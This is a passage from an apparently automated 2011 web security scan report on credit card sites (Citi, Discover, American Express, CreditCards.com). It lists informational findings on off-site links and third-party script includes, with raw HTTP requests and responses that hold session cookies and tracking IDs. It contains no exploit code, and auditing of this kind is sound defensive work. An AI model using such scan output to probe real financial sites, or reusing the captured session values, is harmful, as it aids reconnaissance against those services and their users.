Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; HSID4T3ZJ3000=vqPrL3WjoMdXwjrs5f4CZU; CARDS_LOCALE=en; HSID4DNZJ3000=pLRZjGMdgv4wCXc5EpZAFs; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=C626E9F2656E4606A21348462D13F6BA; ACQHSIDKEY=HSID4DNZJ3000; JSESSIONID=00007gBbtH4r9cLIjAgDf1NVx27:gtcardsrmi10crd; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308315416062%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:26:56 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: CARDS_LOCALE=en; Path=/
Set-cookie: ACQHSIDKEY=HSID4DNZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 32300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


...[SNIP]...
<noscript><iframe src="https://switch.atdmt.com/iaction/dencit_applicationpage_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<p><a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayTerms?sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&d=&uc=ALS&AMEX_PID_AF_CODE=&AAPID=" target="_blank"><sup>
...[SNIP]...
<div id="apply-footer-right">


                                                                                                                       <a ID="cmlink_Verisign_logo" class="noarrow" onclick="javascript:void(window.open('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en', '', 'width=600,height=450,menubar=no,scrollbars=yes,location=yes'));return false" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en" target="_blank" title="" ><img ID="cmimage_Verisign_logo" src="/cards/acq/img/logo-verisign.gif" width="94" height="53" border="0" >
...[SNIP]...

15.33. https://www.citicards.com/cards/acq/displayECM.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/cards/acq/displayECM.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.citicards.com/cards/acq/displayECM.do?screenID=3000&flow=web&siteId=CB&sc=4T3VJTP13CJ5MDQ94VW&B=M&app=UNSOL&m=3CJ5MDQ94VW&langId=EN&locale=en_US&ECM_SHORTCUT=Y

The response contains the following links to other domains:

https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en
https://switch.atdmt.com/iaction/dencit_applicationpage_4
https://www.accountonline.com/ACQ/DisplayTerms?sc=4T3VJTP13CJ5MDQ94VW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4T3VKSW13CJ5MDQ94VW&B1=M&DownsellSourceCode2=4T3VLSX13CJ5MDQ94VW&B2=M&t=t&d=&uc=AKB&AMEX_PID_AF_CODE=&AAPID=

Request

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:16:43 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: JSESSIONID=0000fNcTBpmEK6E4ec12wszbhSM:gtcardsrmi10crd; Path=/; Secure
Set-cookie: CARDS_LOCALE=en; Path=/
Set-cookie: ACQHSIDKEY=HSID4T3VJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 32304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


...[SNIP]...
<noscript><iframe src="https://switch.atdmt.com/iaction/dencit_applicationpage_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<p><a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayTerms?sc=4T3VJTP13CJ5MDQ94VW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4T3VKSW13CJ5MDQ94VW&B1=M&DownsellSourceCode2=4T3VLSX13CJ5MDQ94VW&B2=M&t=t&d=&uc=AKB&AMEX_PID_AF_CODE=&AAPID=" target="_blank"><sup>
...[SNIP]...
<div id="apply-footer-right">


                                                                                                                       <a ID="cmlink_Verisign_logo" class="noarrow" onclick="javascript:void(window.open('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en', '', 'width=600,height=450,menubar=no,scrollbars=yes,location=yes'));return false" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en" target="_blank" title="" ><img ID="cmimage_Verisign_logo" src="/cards/acq/img/logo-verisign.gif" width="94" height="53" border="0" >
...[SNIP]...

15.34. http://www.creditcards.com/oc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The page was loaded from a URL containing a query string:

http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1

The response contains the following links to other domains:

http://112.2o7.net/b/ss/ccardsccdc-us/1/H.15.1--NS/0
http://www.omniture.com/

Request

Response

15.35. https://www.discovercard.com/cardmembersvcs/acqs/app/getapp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/getapp

Issue detail

The page was loaded from a URL containing a query string:

https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433

The response contains the following links to other domains:

https://ad.yieldmanager.com/pixel?id=125362&t=2
https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=0
https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=1000
https://https.edge.ru4.com/smartserve/ad?placement=pt-2594-001&invocation=0&forcejs&cat=stud01&application_id=&type=apply01
https://sales.liveperson.net/hc/71384334/x.js?cmd=file&file=chatScript3&site=71384334
https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js

Request

GET /cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433 HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22184470&pg=11&pgpos=23
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:42 GMT
Server: Apache
x-wily-info: Clear guid=9D931E570A07140C5912591240530E5F
x-wily-servlet: Encrypt1 U+w0Pb5QTikwsT8iugvWOJNu7fg/9GyIIBtkAOCoPV3XLJ8bKoAP5Qp4UeZYQhg/EOPPu3f/MWLkbqeCF94+ffXlkdXToIemaij8eitKNxYVnSX84prIlAieVCVl3mCloLlJhr6obl/4Ye19y44eB5yYnNXNk4EO+simsERXK6TADthgUSpN3bo6FU/OktNT
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 118880

                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
                           <html>

                               <head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</script>
                               <IFRAME width="1" height="1" scrolling="no" frameborder="0" src="https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=1000"><SCRIPT src="https://https.edge.ru4.com/smartserve/ad?placement=pt-2008-099&invocation=0"></SCRIPT>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://sales.liveperson.net/hc/71384334/x.js?cmd=file&file=chatScript3&site=71384334"></script>
...[SNIP]...

                               <img src="https://ad.yieldmanager.com/pixel?id=125362&t=2" width="1" height="1" />
                               
...[SNIP]...
</noscript>

           <script type="text/javascript" src="https://sales.liveperson.net/hcp/html/DynamicButtonScript2.js"></script>
...[SNIP]...

                                           <SCRIPT src="https://https.edge.ru4.com/smartserve/ad?placement=pt-2594-001&invocation=0&forcejs&cat=stud01&application_id=&type=apply01"></SCRIPT>
...[SNIP]...

15.36. http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www262.americanexpress.com
Path:	/landing-page/business-cards/mclp/scashplum/pm0002/42732

Issue detail

The page was loaded from a URL containing a query string:

http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g

The response contains the following links to other domains:

http://static.atgsvcs.com/js/atgsvcs.js
http://www.facebook.com/americanexpress
http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR
http://www.twitter.com/americanexpress
http://www.youtube.com/americanexpress

Request

GET /landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g HTTP/1.1
Host: www262.americanexpress.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22035646&pg=17&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1308311996862975

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:02 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<he
...[SNIP]...
<li>
<a id="footer_MR" title="" href="http://www.membershiprewards.com/HomePage.aspx?us_nu=dd&inav=footer_MR">Membership Rewards® Program</a>
...[SNIP]...
</a><a title="Facebook - Link will open in a new window" href="http://www.facebook.com/americanexpress"><img class="iNavIcoFaceBook" title="Facebook - Link will open in a new window" alt="Facebook - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /
...[SNIP]...
</a> <a title="Twitter - Link will open in a new window" href="http://www.twitter.com/americanexpress"><img class="iNavIcoTwitter" title="Twitter - Link will open in a new window" alt="Twitter - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" /></a> <a title="YouTube - Link will open in a new window" href="http://www.youtube.com/americanexpress"><img class="iNavIcoYouTube" title="YouTube - Link will open in a new window" alt="YouTube - Link will open in a new window" src="https://secure.americanexpress.com/NextGenNavigation/img/clear.gif" />
...[SNIP]...

<script type='text/javascript' src='http://static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...

15.37. https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www262.americanexpress.com
Path:	/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue detail

The page was loaded from a URL containing a query string:

https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/?intlink=us-scandplum-plan1

The response contains the following links to other domains:

https://fls.doubleclick.net/activityi;src=1297440;type=open;cat=gmbapp;ord=1;num=1?
https://static.atgsvcs.com/js/atgsvcs.js
https://tracker.marinsm.com/tp?act=1&cid=875h1m6499&script=no
https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal
https://www.americanexpressfhr.com/ssl/travel/gateway.rvlx?inav=menu_travel_fhr&action_route=1:HOTEL:0:START::SWF
https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum

Request

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:03:56 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: s_vi=[CS]v1|26FDA14A051D10C8-4000012AC0103AC7[CE]; Expires=Wed, 15 Jun 2016 12:03:57 GMT; Path=/; Domain=.americanexpress.com
Cache-Control: no-store, no-cache=set-cookie
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 96151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en">

...[SNIP]...
</script>

<script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...
<li>
<a title="" href="https://www.aeprepaid.com/index.cfm?clientkey=retail%20sales%20channel&inav=menu_myacct_giftcardbal" id="menu_myacct_giftcardbal">Gift Card Balance</a>
...[SNIP]...
<li>
<a title="" href="https://www.americanexpressfhr.com/ssl/travel/gateway.rvlx?inav=menu_travel_fhr&action_route=1:HOTEL:0:START::SWF#main=1" id="menu_travel_fhr&action_route=1:HOTEL:0:START::SWF#main=1">Fine Hotels & Resorts</a>
...[SNIP]...
<li>
<a title="" href="https://www.openforum.com/?cid=inav_home&inav=menu_business_openforum" id="menu_business_openforum">OPEN Forum</a>
...[SNIP]...
<noscript><iframe src="https://fls.doubleclick.net/activityi;src=1297440;type=open;cat=gmbapp;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<noscript><img src="https://tracker.marinsm.com/tp?act=1&cid=875h1m6499&script=no" width="0" height="0" size="0" /></noscript>
...[SNIP]...

16. Cross-domain script include previous next
There are 15 instances of this issue:

https://application.capitalone.com/icoreapp/jsp/landing.jsp
http://blogs.creditcards.com/
http://blogs.creditcards.com/fine-print/
https://creditcards.citi.com/
http://googleads.g.doubleclick.net/pagead/ads
https://www.citicards.com/cards/acq/Apply.do
http://www.creditcards.com/business.php
http://www.creditcards.com/low-interest-page-4.php
http://www.creditcards.com/low-interest.php
http://www.creditcards.com/points-rewards.php
https://www.discovercard.com/cardmembersvcs/acqs/app/exec
https://www.discovercard.com/cardmembersvcs/acqs/app/getapp
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732
https://www262.americanexpress.com/business-card-application/simplycash-business-credit-card/apply/42732-9-0
https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

16.1. https://application.capitalone.com/icoreapp/jsp/landing.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://application.capitalone.com
Path:	/icoreapp/jsp/landing.jsp

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=application.capitalone.com&size=S&use_flash=NO&use_transparent=NO&lang=en

Request

Response

16.2. http://blogs.creditcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s46.sitemeter.com/js/counter.js?site=s46cccgblog
http://s9.addthis.com/js/widget.php?v=10

Request

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:49 GMT
Server: Apache
Content-Type: text/html
Content-Length: 102122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
</script>
<script type="text/javascript" src="http://s9.addthis.com/js/widget.php?v=10"></script>
...[SNIP]...

<script type="text/javascript" src="http://s46.sitemeter.com/js/counter.js?site=s46cccgblog"></script>
...[SNIP]...

16.3. http://blogs.creditcards.com/fine-print/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/fine-print/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s46.sitemeter.com/js/counter.js?site=s46cccgblog
http://s9.addthis.com/js/widget.php?v=10

Request

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:29 GMT
Server: Apache
Content-Type: text/html
Content-Length: 101644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

<li
...[SNIP]...
</script>
<script type="text/javascript" src="http://s9.addthis.com/js/widget.php?v=10"></script>
...[SNIP]...

<script type="text/javascript" src="http://s46.sitemeter.com/js/counter.js?site=s46cccgblog"></script>
...[SNIP]...

16.4. https://creditcards.citi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://creditcards.citi.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://mpsnare.iesnare.com/snare.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 66519
Content-Type: text/html; charset=utf-8
Expires: -1
Date: Fri, 17 Jun 2011 12:44:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl0
...[SNIP]...
</script><script type="text/javascript" src="https://mpsnare.iesnare.com/snare.js"></script>
...[SNIP]...

16.5. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js

Request

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

16.6. https://www.citicards.com/cards/acq/Apply.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/cards/acq/Apply.do

Issue detail

The response dynamically includes the following script from another domain:

https://mpsnare.iesnare.com/snare.js

Request

Response

16.7. http://www.creditcards.com/business.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/business.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.bkrtx.com/js/bk-static.js

Request

GET /business.php HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311914; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311931237%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Apoints-rewards%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/business.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:51 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43464

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Business Credit Cards - CreditCards.com</title>
<meta name="keywords"
...[SNIP]...
</iframe>
<script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

16.8. http://www.creditcards.com/low-interest-page-4.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/low-interest-page-4.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.bkrtx.com/js/bk-static.js

Request

GET /low-interest-page-4.php HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/low-interest.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308312739652864; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308312780; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308313704660%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Alow-interest%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/low-interest-page-4.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:24 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29128

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Low Interest Credit Cards - CreditCards.com</title>
<meta name="keywo
...[SNIP]...
</iframe>
<script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

16.9. http://www.creditcards.com/low-interest.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/low-interest.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.bkrtx.com/js/bk-static.js

Request

GET /low-interest.php HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; CCsCookieimp=1308312001; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308312739652864; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308312744303%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253Dhome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/low-interest.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:12:23 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43434

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Low Interest Credit Cards - CreditCards.com</title>
<meta name="keywo
...[SNIP]...
</iframe>
